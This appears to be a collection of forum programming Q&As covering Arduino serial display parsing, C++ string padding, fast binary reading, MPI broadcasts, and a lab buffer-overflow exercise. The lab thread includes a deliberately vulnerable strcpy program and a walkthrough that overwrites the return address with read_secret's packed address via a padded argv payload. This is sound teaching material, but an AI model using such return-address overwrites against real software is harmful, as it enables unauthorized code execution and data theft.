I am currently working on an Arduino monitoring device. The data is collected in Python and then sent as a string over serial to the Arduino.
In Python the string is built like this:
cpu1 = space_pad(int(my_info['cpu_load']), 2)
cpu2 = space_pad(int(my_info['cpu_temp']), 2)
cpu3 = space_pad(int(my_info['cpu_fan']), 5)
# Send the strings via serial to the Arduino
arduino_str = \
'A' + cpu1 + '|B' + cpu2 + '|C' + cpu3 + '|'
if serial_debug:
    print(arduino_str)
else:
    ser.write(arduino_str.encode())
Ideally I want to extend this string to carry 10 variables to the Arduino.
The Arduino code is supposed to read the individual parts of the string and place them neatly on a display, each in its own reserved space.
The problem is that I get garbled results. When the string is only made out of just one variable, then it shows just fine, where it should, as it should.
When adding an additional variable to the string, the code breaks and it mixes the results or displays them chaotically. My variables are all clean, just numbers, nothing fancy.
Below is the code I use on the arduino
#include <Wire.h>
#include <LiquidCrystal_I2C.h> // Library for LCD
LiquidCrystal_I2C lcd(0x27,20,4); // I2C address 0x27, 20 column and 4 rows
String inputString = ""; // String for buffering the message
boolean stringComplete = false; // Indicates if the string is complete
unsigned long previousUpdate = 0; // Long to keep the time since last received message
void printInitialLCDStuff() {
lcd.setCursor(0, 0);
lcd.print("CPU ");
lcd.setCursor(7, 0);
lcd.print("%");
lcd.setCursor(11, 0);
lcd.print("C");
lcd.setCursor(17, 0);
lcd.print("RPM");
lcd.setCursor(0, 1);
lcd.print("GPU ");
lcd.setCursor(7, 1);
lcd.print("%");
lcd.setCursor(11, 1);
lcd.print("C");
lcd.setCursor(17, 1);
lcd.print("RPM");
lcd.setCursor(0, 2);
lcd.print("MEM");
lcd.setCursor(8, 2);
lcd.print("MB");
lcd.setCursor(17, 2);
lcd.print("PWM");
lcd.setCursor(0, 3);
lcd.print("RAM ");
lcd.setCursor(8, 3);
lcd.print("GBU");
lcd.setCursor(17, 3);
lcd.print("GBF");
}
void serialEvent() {
while (Serial.available()) {
char inChar = (char)Serial.read();
inputString += inChar;
if (inChar == '|') {
stringComplete = true;
}
}
}
void setup() {
// Setup LCD
lcd.init(); //initialize the lcd
lcd.backlight(); //open the backlight
lcd.setCursor(0, 0);
printInitialLCDStuff();
// Setup serial
Serial.begin(9600);
inputString.reserve(200);
}
void loop() {
serialEvent();
if (stringComplete) {
// CPU1
int cpu1StringStart = inputString.indexOf("A");
int cpu1StringLimit = inputString.indexOf("|");
String cpu1String = inputString.substring(cpu1StringStart + 1, cpu1StringLimit);
lcd.setCursor(4, 0);
lcd.print(cpu1String);
// CPU2
int cpu2StringStart = inputString.indexOf("B", cpu1StringLimit);
int cpu2StringLimit = inputString.indexOf("|", cpu2StringStart);
String cpu2String = inputString.substring(cpu2StringStart + 1, cpu2StringLimit);
lcd.setCursor(9, 0);
lcd.print(cpu2String);
// CPU3
int cpu3StringStart = inputString.indexOf("C", cpu2StringLimit);
int cpu3StringLimit = inputString.indexOf("|", cpu3StringStart);
String cpu3String = inputString.substring(cpu3StringStart + 1, cpu3StringLimit);
lcd.setCursor(13, 0);
lcd.print(cpu3String);
inputString = "";
stringComplete = false;
previousUpdate = millis();
}
}
My code is very dirty and it is mostly an adaptation of someone else's code, because while I can read code, I am terrible at writing it. Apologies if I made horrible mistakes that would make anybody cringe. I admit I am just dabbling with coding. This is why I added comments to the code so often.
I expect my display to show like this:
CPU 60% 45C 900RPM
Where
cpu1=60
cpu2=45
cpu3=900
The "CPU", "%", "C" and "RPM" labels are written by the Arduino in printInitialLCDStuff(), not by Python.
Instead I get this
CPU B45% B45|B45|C
and then the RPM is listed on line 3 at (0,0) as "900|"
Ideally I want to expand the string sorting to collect about 10 variables.
It looks to me like the problem is in the arduino code, since the Python script kinda checks out and outputs the string correctly. But I could be wrong.
The question is: am I using the wrong code to extract these variables and place them in their reserved space on the display?
Should I use something else to get the job done? I have been looking at documentation for the past 3 days but I couldn't find someone with a similar case. I found some questions here, but again, not quite what I am looking for.
Any help is appreciated. I am so frustrated with this code after trying hours daily for the past days that I am willing to reward anyone that can assist me with this code with a steam digital gift card as way to show my appreciation.
Best regards,
M
I figured it out. Instead of trying to split the string and put each part in a preselected space, I build one single string and control the layout through the string format itself. Now I have an 80-character string that is automatically split into the ranges (0, 20), (20, 40), (40, 60) and (60, 80), one per display line.
Because this is just a simple resource monitor I didn't really need anything fancy, just to display the info on the screen.
Here is what I did
# Prepare CPU string line #1
cpu1 = space_pad(int(my_info['cpu_load']), 3) + '% '
cpu2 = space_pad(int(my_info['cpu_temp']), 2) + 'C '
cpu3 = space_pad(int(my_info['cpu_fan']), 4) + 'RPM'
CPU = 'CPU ' + cpu1 + cpu2 + cpu3
# Prepare GPU string line #2
gpu1 = space_pad(int(my_info['gpu_load']), 3) + '% '
gpu2 = space_pad(int(my_info['gpu_temp']), 2) + 'C '
gpu3 = space_pad(int(my_info['gpu_fan']), 4) + 'RPM'
GPU1 = 'GPU ' + gpu1 + gpu2 + gpu3
# Prepare GPU string line #3
gpu4 = space_pad(int(my_info['gpu_mem']), 4) + 'MB '
gpu5 = space_pad(int(my_info['gpu_pwm']), 3) + '% PWM'
GPU2 = 'MEM ' + gpu4 + gpu5
# Prepare RAM string line #4
ram1 = space_pad(float(my_info['ram_used']), 4) + 'GBU '
ram2 = space_pad(float(my_info['ram_free']), 4) + 'GB'
RAM = 'RAM ' + ram1 + ram2
# Send the strings via serial to the Arduino
arduino_str = \
CPU + GPU1 + GPU2 + RAM + 'F'
if serial_debug:
    print(arduino_str)
else:
    ser.write(arduino_str.encode())
Because the '|' separator kept showing up as the last character of the string, I switched to a letter that I wanted to appear there anyway, basically duct-taping it. I used the character 'F', which acts as the terminator and is also displayed as the last letter of "GBF".
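The fixed-width approach only works if every one of the four lines is exactly 20 characters long, because the Arduino cuts the string at fixed positions. Here is a minimal sketch of one way to enforce that on the Python side. fit_line and build_frame are hypothetical helper names, the sample values are invented, and space_pad from the script above is not used because its definition is not shown.

```python
LCD_COLS = 20  # columns on the 20x4 display
LCD_ROWS = 4


def fit_line(text, width=LCD_COLS):
    """Pad with spaces or truncate so the line is exactly `width` characters."""
    return text[:width].ljust(width)


def build_frame(lines, terminator="F"):
    """Join exactly LCD_ROWS lines into one fixed-width frame plus a terminator."""
    if len(lines) != LCD_ROWS:
        raise ValueError("expected %d lines, got %d" % (LCD_ROWS, len(lines)))
    return "".join(fit_line(line) for line in lines) + terminator


# Sample values, invented for illustration only.
frame = build_frame([
    "CPU {:3d}% {:2d}C {:4d}RPM".format(60, 45, 900),
    "GPU {:3d}% {:2d}C {:4d}RPM".format(12, 38, 0),
    "MEM {:4d}MB {:3d}% PWM".format(2048, 30),
    "RAM {:4.1f}GBU {:4.1f}GB".format(7.5, 8.5),
])
```

Note that the terminator character must not occur anywhere inside the four lines, otherwise the receiver would treat the frame as complete too early.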
As for the Arduino code:
#include <Wire.h>
#include <LiquidCrystal_I2C.h> // Library for LCD
LiquidCrystal_I2C lcd(0x27,20,4); // I2C address 0x27, 20 column and 4 rows
String inputString = ""; // String for buffering the message
boolean stringComplete = false; // Indicates if the string is complete
unsigned long previousUpdate = 0; // Long to keep the time since last received message
void printInitialLCDStuff() {
}
void serialEvent() {
while (Serial.available()) {
char inChar = (char)Serial.read();
inputString += inChar;
if (inChar == 'F') {
stringComplete = true;
}
}
}
void setup() {
// Setup LCD
lcd.init(); //initialize the lcd
lcd.backlight(); //open the backlight
printInitialLCDStuff();
lcd.setCursor(0, 0);
lcd.print("Arduino PC Monitor");
lcd.setCursor(0, 1);
lcd.print("Waiting for data...");
lcd.setCursor(12, 3);
lcd.print("Ver 1.0");
// Setup serial
Serial.begin(9600);
inputString.reserve(200);
}
void loop() {
serialEvent();
if (stringComplete) {
// 1st line
String cpuString = inputString.substring(0, 20);
lcd.setCursor(0, 0);
lcd.print(cpuString);
// 2nd line
String gpu1String = inputString.substring(20, 40);
lcd.setCursor(0, 1);
lcd.print(gpu1String);
// 3rd line
String gpu2String = inputString.substring(40, 60);
lcd.setCursor(0, 2);
lcd.print(gpu2String);
// 4th line
String ramString = inputString.substring(60, 80);
lcd.setCursor(0, 3);
lcd.print(ramString);
inputString = "";
stringComplete = false;
previousUpdate = millis();
}
}
Yes, it is that lazy, it is almost as sophisticated as counting on your fingers. I love how simple it is. Anything can be edited on the fly and all it takes is minimal knowledge.
I can understand if I get banned for being this lazy.
Thank you for your help. I have noted the advice on string splits if I need to do something more complicated.
Best regards,
M
Your code could be patched to make it work, but I think it is better to take a different approach.
First, in your Python code, the prefixes A, B, ... are redundant and do not help the receiving side parse the data. If you format your data as a single string with | as the separator and end it with a newline, it is easier to parse, and it is also much easier to create in Python.
arduino_str = "{}|{}|{}|{}|{}|{}|{}|{}|{}|{}\n".format(
    data0, data1, data2, data3, data4,
    data5, data6, data7, data8, data9)
if serial_debug:
    print(arduino_str)
else:
    ser.write(arduino_str.encode())
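If the number of values may change, the same line can be built with join instead of a long format string. This is only a sketch: build_message and parse_message are hypothetical helper names, and parse_message is there just to show the split that the receiver has to perform.

```python
def build_message(values, sep="|", end="\n"):
    """Join values with `sep` and finish the line with `end`."""
    fields = [str(v) for v in values]
    for field in fields:
        # A separator or newline inside a field would corrupt the framing.
        if sep in field or end in field:
            raise ValueError("field contains a reserved character: %r" % field)
    return sep.join(fields) + end


def parse_message(message, sep="|", end="\n"):
    """Inverse of build_message; mirrors what the receiving side has to do."""
    return message.rstrip(end).split(sep)


message = build_message([60, 45, 900])
fields = parse_message(message)
```

With the script above, sending would then be ser.write(build_message(values).encode()).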
On the Arduino side, Serial.readStringUntil('\n') reads the entire string until a \n (the end of the line) is encountered. Once the entire string is received, you can use the C strtok() function to split it at the delimiter (in this case |) into an array, so the resulting array looks like this:
splitted[0] = data0;
splitted[1] = data1;
....
splitted[9] = data9;
You can then print the data in the array to the LCD.
#include <Wire.h>
#include <LiquidCrystal_I2C.h> // Library for LCD
#define NUMBER_OF_DATA 10
LiquidCrystal_I2C lcd(0x27,20,4); // I2C address 0x27, 20 column and 4 rows
String incomingString = "";
void setup()
{
  // Setup LCD
  lcd.init();
  lcd.backlight();
  // Static labels; the spacing matches the column positions used in the question
  lcd.setCursor(0, 0);
  lcd.print("CPU    %   C     RPM");
  lcd.setCursor(0, 1);
  lcd.print("GPU    %   C     RPM");
  lcd.setCursor(0, 2);
  lcd.print("MEM     MB       PWM");
  lcd.setCursor(0, 3);
  lcd.print("RAM     GBU      GBF");
  // Setup serial
  Serial.begin(9600);
}
void loop()
{
  // Nothing to do until at least one byte has arrived
  if (Serial.available() == 0) {
    return;
  }
  // Read one full line; readStringUntil() drops the '\n' terminator
  incomingString = Serial.readStringUntil('\n');
  if (incomingString.length() == 0) {
    return;
  }
  // Copy into a writable char array, because strtok() modifies its input
  char temp[incomingString.length() + 1];
  strcpy(temp, incomingString.c_str());
  incomingString = "";
  // Split the line at '|' into an array of short strings
  char splitted[NUMBER_OF_DATA][10] = {{'\0'}};   // up to 9 characters per field
  int i = 0;
  char *p = strtok(temp, "|");                    // first field
  while (p != NULL && i < NUMBER_OF_DATA) {
    strncpy(splitted[i], p, sizeof(splitted[i]) - 1);   // keeps the final '\0'
    i++;
    p = strtok(NULL, "|");                        // next field
  }
  // update LCD with the data in the array
  lcd.setCursor(4, 0);
  lcd.print(splitted[0]);
  lcd.setCursor(9, 0);
  lcd.print(splitted[1]);
  lcd.setCursor(13, 0);
  lcd.print(splitted[2]);
  // print the rest of data
  lcd.setCursor(13, 3);
  lcd.print(splitted[9]);
}
I wrote this based on your code and have not tested it on an Arduino, so it might need some debugging if it does not work out of the box. I hope this helps you learn a few tricks and a little about C++ strings and char arrays.
In Python you are able to do things such as
word = "e" * 5
print(word)
To get
"eeeee"
But when I attempt the same thing in C++, the output doesn't contain any text. Here is the code I'm attempting:
playerInfo.name + ('_' * (20 - sizeof(playerInfo.name)))
I'm trying to balance the length of the string so that everything on the player list lines up.
Thanks in advance for any help
If your actual problem is that you want to display names to a certain width, then don't modify the underlying data. Instead, take advantage of ostream's formatting capabilities to set alignment and fill width. Underlying data should not be modified to cater to display. The displaying function should be able to take the underlying data and format it as required.
This is taken from https://en.cppreference.com/w/cpp/io/manip/left which describes specifically the std::left function, but shows examples of std::setw and std::setfill, which should get you what you want. You will need to #include <iomanip> to use these functions.
#include <iostream>
#include <iomanip>
int main(int argc, char** argv)
{
const char name1[] = "Yogesh";
const char name2[] = "John";
std::cout << "|" << std::setfill(' ') << std::setw(10) << std::left << name1 << "|\n";
std::cout << "|" << std::setfill('*') << std::setw(10) << std::right << name2 << "|\n";
}
Outputs
|Yogesh    |
|******John|
A note on the persistence of std::cout and ostreams
Note that std::cout is a std::ostream object, and by default lives for the lifetime of your program (or for enough of your program that it's close enough to the lifetime). As an object, it has member variables. When we call std::setfill('*') we're setting one of those member variables (the fill character) and overwriting the default fill character. When we call std::setw(10) we're setting the underlying width of the stream until another function clears it.
std::setfill, std::left, std::right will persist until you explicitly set them to something else (they don't return to defaults automatically). std::setw will persist until one of (from https://en.cppreference.com/w/cpp/io/manip/setw)
operator<<(basic_ostream&, char) and operator<<(basic_ostream&, char*)
operator<<(basic_ostream&, basic_string&)
std::put_money (inside money_put::put())
std::quoted (when used with an output stream)
So std::setw will persist until basically the next std::string or const char * output.
In case of repeating a single character, you can use std::string(size_type count, CharT ch) like this:
std::string str(5, 'e');
std::cout << str << std::endl; // eeeee
There is no overloaded * operator for std::string. You have to write a custom function:
std::string multiply_str(const std::string& in, size_t count)
{
    std::string ret;
    ret.reserve(in.size() * count);
    for (size_t i = 0; i < count; i++)
        ret += in;
    return ret;
}
Or, if it is only one character (the count comes first, then the character):
std::string(how_many, your_char)
I’m reading a file in C++ and Python as a binary file. I need to divide the binary into blocks, each 6 bytes. For example, if my file is 600 bytes, the result should be 100 blocks, each 6 bytes.
I have tried struct (in C++ and Python) and array (Python). None of them divide the binary into blocks of 6 bytes. They can only divide the binary into blocks each power of two (1, 2, 4, 8, 16, etc.).
The array algorithm was very fast, reading 1 GB of binary data in less than a second as blocks of 4 bytes. In contrast, I used some other methods, but all of them are extremely slow, taking tens of minutes to do it for a few megabytes.
How can I read the binary as blocks of 6 bytes as fast as possible? Any help in either C++ or Python will be great. Thank you.
EDIT - The Code:
struct Block
{
char data[6];
};
class BinaryData
{
private:
char data[6];
public:
BinaryData() {};
~BinaryData() {};
void readBinaryFile(string strFile)
{
Block block;
ifstream binaryFile;
int size = 0;
binaryFile.open(strFile, ios::out | ios::binary);
binaryFile.seekg(0, ios::end);
size = (int)binaryFile.tellg();
binaryFile.seekg(0, ios::beg);
cout << size << endl;
while ( (int)binaryFile.tellg() < size )
{
cout << binaryFile.tellg() << " , " << size << " , " <<
size - (int)binaryFile.tellg() << endl;
binaryFile.read((char*)block.data,sizeof(block.data));
cout << block.data << endl;
//cin >> block.data;
if (size - (int)binaryFile.tellg() > size)
{
break;
}
}
binaryFile.close();
}
};
Notes:
In the file, the numbers are big endian.
The goal is to read them as fast as possible and then sort them in ascending order.
Let's start simple, then optimize.
Simple Loop
uint8_t array1[6];
while (my_file.read((char *) &array1[0], 6))
{
Process_Block(&array1[0]);
}
The above code reads in a file, 6 bytes at a time and sends the block to a function.
Meets the requirements, not very optimal.
Reading Larger Blocks
Files are streaming devices. They have an overhead to start streaming, but are very efficient to keep streaming. In other words, we want to read as much data per transaction to reduce the overhead.
static const unsigned int CAPACITY = 6 * 1024;
uint8_t block1[CAPACITY];
// read() reports failure on the final short chunk, so also check gcount() for leftover bytes
while (my_file.read((char *) &block1[0], CAPACITY) || my_file.gcount() > 0)
{
    const size_t bytes_read = my_file.gcount();
    size_t blocks_read = bytes_read / 6;   // not const: it is counted down below
    uint8_t const * block_pointer = &block1[0];
    while (blocks_read > 0)
    {
        Process_Block(block_pointer);
        block_pointer += 6;
        --blocks_read;
    }
}
The above code reads up to 1024 blocks in one transaction. After reading, each block is sent to a function for processing.
This version is more efficient than the Simple Loop, as it reads more data per transaction. Adjust the CAPACITY to find the optimal size on your platform.
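Since the question also asks about Python, the same "read many blocks per call" idea can be sketched there as well. This is an illustration rather than a tuned implementation: read_blocks is a hypothetical name, the sample bytes are invented, and each 6-byte block is assumed to be an unsigned big-endian integer as stated in the question's notes.

```python
import io

BLOCK_SIZE = 6


def read_blocks(stream, blocks_per_read=1024):
    """Yield each 6-byte block as an unsigned big-endian integer."""
    chunk_size = BLOCK_SIZE * blocks_per_read
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        # Drop a trailing partial block if the data is not a multiple of 6 bytes.
        usable = len(chunk) - len(chunk) % BLOCK_SIZE
        for offset in range(0, usable, BLOCK_SIZE):
            yield int.from_bytes(chunk[offset:offset + BLOCK_SIZE], "big")


# Invented sample data: three blocks holding 256, 2 and 1.
sample = io.BytesIO(bytes([0, 0, 0, 0, 1, 0,
                           0, 0, 0, 0, 0, 2,
                           0, 0, 0, 0, 0, 1]))
values = sorted(read_blocks(sample, blocks_per_read=2))
```

For a real file, the stream would come from open(path, "rb"). As with CAPACITY above, blocks_per_read is something to measure on your own platform.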
Loop Unrolling
The previous code reduces the first bottleneck of input transfer speed (although there is still room for optimization). Another technique is to reduce the overhead of the processing loop by performing more data processing inside the loop. This is called loop unrolling.
const size_t bytes_read = my_file.gcount();
size_t blocks_read = bytes_read / 6;   // not const: it is decremented below
uint8_t const * block_pointer = &block1[0];
while ((blocks_read / 4) != 0)
{
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
blocks_read -= 4;
}
while (blocks_read > 0)
{
Process_Block(block_pointer);
block_pointer += 6;
--blocks_read;
}
You can adjust the quantity of operations in the loop, to see how it affects your program's speed.
Multi-Threading & Multiple Buffers
Another two techniques for speeding up the reading of the data, are to use multiple threads and multiple buffers.
One thread, an input thread, reads the file into a buffer. After reading into the first buffer, the thread sets a semaphore indicating there is data to process. The input thread reads into the next buffer. This repeats until the data is all read. (For a challenge, figure out how to reuse the buffers and notify the other thread of which buffers are available).
The second thread is the processing thread. This processing thread is started first and waits for the first buffer to be completely read. After the buffer has the data, the processing thread starts processing the data. After the first buffer has been processed, the processing thread starts on the next buffer. This repeats until all the buffers have been processed.
The goal here is to use as many buffers as necessary to keep the processing thread running and not waiting.
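The two-thread scheme can be sketched in Python as follows. Note the assumptions: a bounded queue.Queue stands in for the semaphores and the set of buffers described above, all function names are hypothetical, and in CPython the benefit comes mainly from overlapping file I/O with processing, since threads do not run Python code in parallel.

```python
import io
import queue
import threading

BLOCK_SIZE = 6


def reader(stream, buffers, chunk_size):
    """Input thread: read chunks and hand them to the processing thread."""
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        buffers.put(chunk)  # blocks while every buffer slot is in use
    buffers.put(None)       # sentinel: no more data


def process(buffers, results):
    """Processing thread: decode every complete 6-byte block of each chunk."""
    while True:
        chunk = buffers.get()  # waits until a buffer has been filled
        if chunk is None:
            break
        usable = len(chunk) - len(chunk) % BLOCK_SIZE
        for offset in range(0, usable, BLOCK_SIZE):
            results.append(int.from_bytes(chunk[offset:offset + BLOCK_SIZE], "big"))


def read_with_two_threads(stream, blocks_per_read=1024, buffer_count=4):
    """Run one input thread and one processing thread over `stream`."""
    buffers = queue.Queue(maxsize=buffer_count)
    results = []
    worker = threading.Thread(target=process, args=(buffers, results))
    producer = threading.Thread(
        target=reader, args=(stream, buffers, BLOCK_SIZE * blocks_per_read))
    worker.start()    # the processing thread starts first and waits for data
    producer.start()
    producer.join()
    worker.join()
    return results


# Invented sample data: two blocks, bytes 0x00..0x05 and 0x06..0x0B.
sample = io.BytesIO(bytes(range(12)))
decoded = read_with_two_threads(sample, blocks_per_read=1)
```

The buffer_count parameter plays the role of "as many buffers as necessary": the input thread stalls only when that many chunks are waiting to be processed.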
Edit 1: Other techniques
Memory Mapped Files
Some operating systems support memory mapped files. The OS reads a portion of the file into memory. When a location outside the memory is accessed, the OS loads another portion into memory. Whether this technique improves performance needs to be measured (profiled).
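In Python, memory mapping is available through the standard mmap module. The sketch below is only an illustration of the idea: blocks_from_mapped_file is a hypothetical name, the demo file is a temporary file with invented contents, and whether this beats chunked reads has to be measured.

```python
import mmap
import os
import tempfile

BLOCK_SIZE = 6


def blocks_from_mapped_file(path):
    """Decode every complete 6-byte big-endian block of a memory-mapped file."""
    with open(path, "rb") as f:
        # Length 0 maps the whole file; an empty file cannot be mapped.
        with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as mapped:
            usable = len(mapped) - len(mapped) % BLOCK_SIZE
            return [int.from_bytes(mapped[i:i + BLOCK_SIZE], "big")
                    for i in range(0, usable, BLOCK_SIZE)]


# Demo on a small temporary file holding the values 7 and 3.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(bytes([0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 3]))
mapped_values = blocks_from_mapped_file(tmp.name)
os.remove(tmp.name)
```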
Parallel Processing & Threading
Adding multiple threads may show negligible performance gain. Computers have a data bus (data highway) connecting many hardware devices, including memory, file I/O and the processor. Devices will be paused to let other devices use the data highway. With multiple cores or processors, one processor may have to wait while the other processor is using the data highway. This waiting may cause negligible performance gain when using multiple threads or parallel processing. Also, the operating system has overhead when constructing and maintaining threads.
Try this. The input file is given as the program's argument. As you said, I assume the 6-byte values in the file are written in big-endian order, but I make no assumption about the machine that reads and sorts them: the program runs on both little- and big-endian hosts (the check is done at run time).
#include <iostream>
#include <fstream>
#include <vector>
#include <cstdint>
#include <algorithm>
#include <limits.h> // CHAR_BIT
using namespace std;
#if CHAR_BIT != 8
# error that code supposes a char has 8 bits
#endif
int main(int argc, char ** argv)
{
if (argc != 2)
cerr << "Usage: " << argv[0] << " <file>" << endl;
else {
ifstream in(argv[1], ios::binary);
if (!in.is_open())
cerr << "Cannot open " << argv[1] << endl;
else {
in.seekg(0, ios::end);
size_t n = (size_t) in.tellg() / 6;
vector<uint64_t> values(n);
uint64_t * p = values.data(); // for performance
uint64_t * psup = p + n;
in.seekg(0, ios::beg);
int i = 1;
if (*((char *) &i)) {
// little endian
unsigned char s[6];
uint64_t v = 0;
while (p != psup) {
if (!in.read((char *) s, 6))
return -1;
((char *) &v)[0] = s[5];
((char *) &v)[1] = s[4];
((char *) &v)[2] = s[3];
((char *) &v)[3] = s[2];
((char *) &v)[4] = s[1];
((char *) &v)[5] = s[0];
*p++ = v;
}
}
else {
// big endian
uint64_t v = 0;
while (p != psup) {
if (!in.read(((char *) &v) + 2, 6))
return -1;
*p++ = v;
}
}
cout << "file successfully read" << endl;
sort(values.begin(), values.end());
cout << "values sort" << endl;
// DEBUG, DO ON A SMALL FILE ;-)
for (auto v : values)
cout << v << endl;
}
}
}
So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I print large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, and returns to the read_secret function, instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I would have to replace the main() address with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability, you first have to identify the offset at which the saved return address gets overwritten. The input length at which you start getting a segfault is a good starting point; in your case I assume it's around 1026. The whole game is to overwrite the saved return address, which ends up in EIP (the register that tells the program what to execute next) when vuln() returns, with an address of your choosing.
To do that you need to know the address of the function you want to run. Open your program in gdb and type:
x read_secret
Then copy the address. You then have to convert it to the byte order of the target (little endian on x86). I do it with the struct module in Python.
import struct
struct.pack("<I", address)  # "<I" packs little endian; use ">I" for big endian
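To make the difference between the two byte orders concrete, here is a small sketch. The address is a made-up placeholder and is not taken from the real binary, and the "I" format assumes a 32-bit target (a 64-bit address would need "Q" instead).

```python
import struct

# Hypothetical address, used only to show the byte order.
address = 0x080484B6

little = struct.pack("<I", address)  # least significant byte first
big = struct.pack(">I", address)     # most significant byte first
```

Here little is b'\xb6\x84\x04\x08' and big is b'\x08\x04\x84\xb6': the same four bytes in opposite order.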
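Then you have to append it to your input to the binary. Since vuln takes the name as its first argument (argv[1]) and not from standard input, pass it on the command line, something like:
/task2/vuln "$(python -c "print 'a' * 1026 + 'the_address'")"
# 'the_address' stands for the packed address bytes
If this doesn't work, add a few more characters to your offset. There might be extra data between the buffer and the return address that you didn't account for.
/task2/vuln "$(python -c "print 'a' * 1034 + 'the_address'")"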
Hope that answers your question.
I have some array of data. What I was trying to do is like this:
Use rank 0 to bcast data to 50 nodes. Each node has 1 mpi process on it with 16 cores available to that process. Then, each mpi process will call python multiprocessing. Some calculations are done, then the mpi process saves the data that was calculated with multiprocessing. The mpi process then changes some variable, and runs multiprocessing again. Etc.
So the nodes do not need to communicate with each other besides the initial startup in which they all receive some data.
The multiprocessing is not working out so well. So now I want to use all MPI.
How can I (if it is possible at all) use an array of integers that refer to MPI ranks for bcast or scatter? For example, with ranks 1-1000 and 12 cores per node, I want to bcast the data to every 12th rank. Then each of those ranks should scatter data to ranks 12th+1 through 12th+12.
This requires the first bcast to communicate with totalrank/12, then each rank will be responsible for sending data to ranks on the same node, then gathering the results, saving it, then sending more data to ranks on the same node.
I don't know enough of mpi4py to give you a code sample with it, but here is what could be a solution in C++. I'm sure you can easily derive Python code from it.
#include <mpi.h>
#include <iostream>
#include <cstdlib> /// for abs
#include <zlib.h> /// for crc32
using namespace std;
int main( int argc, char *argv[] ) {
MPI_Init( &argc, &argv );
// get size and rank
int rank, size;
MPI_Comm_rank( MPI_COMM_WORLD, &rank );
MPI_Comm_size( MPI_COMM_WORLD, &size );
// get the compute node name
char name[MPI_MAX_PROCESSOR_NAME];
int len;
MPI_Get_processor_name( name, &len );
// get an unique positive int from each node names
// using crc32 from zlib (just a possible solution)
uLong crc = crc32( 0L, Z_NULL, 0 );
// mask to 31 bits so the color is never negative (abs() can overflow on INT_MIN)
int color = ( int )( crc32( crc, ( const unsigned char* )name, len ) & 0x7fffffff );
// split the communicator into processes of the same node
MPI_Comm nodeComm;
MPI_Comm_split( MPI_COMM_WORLD, color, rank, &nodeComm );
// get the rank on the node
int nodeRank;
MPI_Comm_rank( nodeComm, &nodeRank );
// create comms of processes of the same local ranks
MPI_Comm peersComm;
MPI_Comm_split( MPI_COMM_WORLD, nodeRank, rank, &peersComm );
// now, masters are all the processes of nodeRank 0
// they can communicate among them with the peersComm
// and with their local slaves with the nodeComm
int worktoDo = 0;
if ( rank == 0 ) worktoDo = 1000;
cout << "Initially [" << rank << "] on node "
<< name << " has " << worktoDo << endl;
MPI_Bcast( &worktoDo, 1, MPI_INT, 0, peersComm );
cout << "After first Bcast [" << rank << "] on node "
<< name << " has " << worktoDo << endl;
if ( nodeRank == 0 ) worktoDo += rank;
MPI_Bcast( &worktoDo, 1, MPI_INT, 0, nodeComm );
cout << "After second Bcast [" << rank << "] on node "
<< name << " has " << worktoDo << endl;
// cleaning up
MPI_Comm_free( &peersComm );
MPI_Comm_free( &nodeComm );
MPI_Finalize();
return 0;
}
As you can see, you first create communicators with the processes on the same node. Then you create peer communicators with all processes that have the same local rank on each node.
From then on, your master process of global rank 0 sends data to the local masters, and they distribute the work on the node they are responsible for.
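For reference, a rough mpi4py counterpart could look like the sketch below. It is untested on a real cluster and makes two assumptions: the function name two_level_bcast is hypothetical, and instead of hashing the node name with crc32 it groups processes with Split_type and MPI.COMM_TYPE_SHARED (MPI-3), which puts processes that can share memory, normally those on one node, into the same communicator.

```python
def two_level_bcast(world, payload, shared_type):
    """Broadcast `payload` from global rank 0 to the node masters, then within each node.

    `world` is expected to behave like mpi4py's MPI.COMM_WORLD and
    `shared_type` like MPI.COMM_TYPE_SHARED.
    """
    rank = world.Get_rank()
    # Processes that can share memory (normally: same node) form one communicator.
    node_comm = world.Split_type(shared_type, key=rank)
    node_rank = node_comm.Get_rank()
    # One communicator per local rank; the one with color 0 holds the node masters.
    peers_comm = world.Split(color=node_rank, key=rank)

    data = payload if rank == 0 else None
    if node_rank == 0:
        data = peers_comm.bcast(data, root=0)  # global rank 0 -> node masters
    data = node_comm.bcast(data, root=0)       # node master -> its local ranks

    peers_comm.Free()
    node_comm.Free()
    return data
```

In a real run, started with mpirun or mpiexec, every process would import MPI from mpi4py and call two_level_bcast(MPI.COMM_WORLD, data, MPI.COMM_TYPE_SHARED). The same node_comm can then be reused for the later scatter and gather steps on each node.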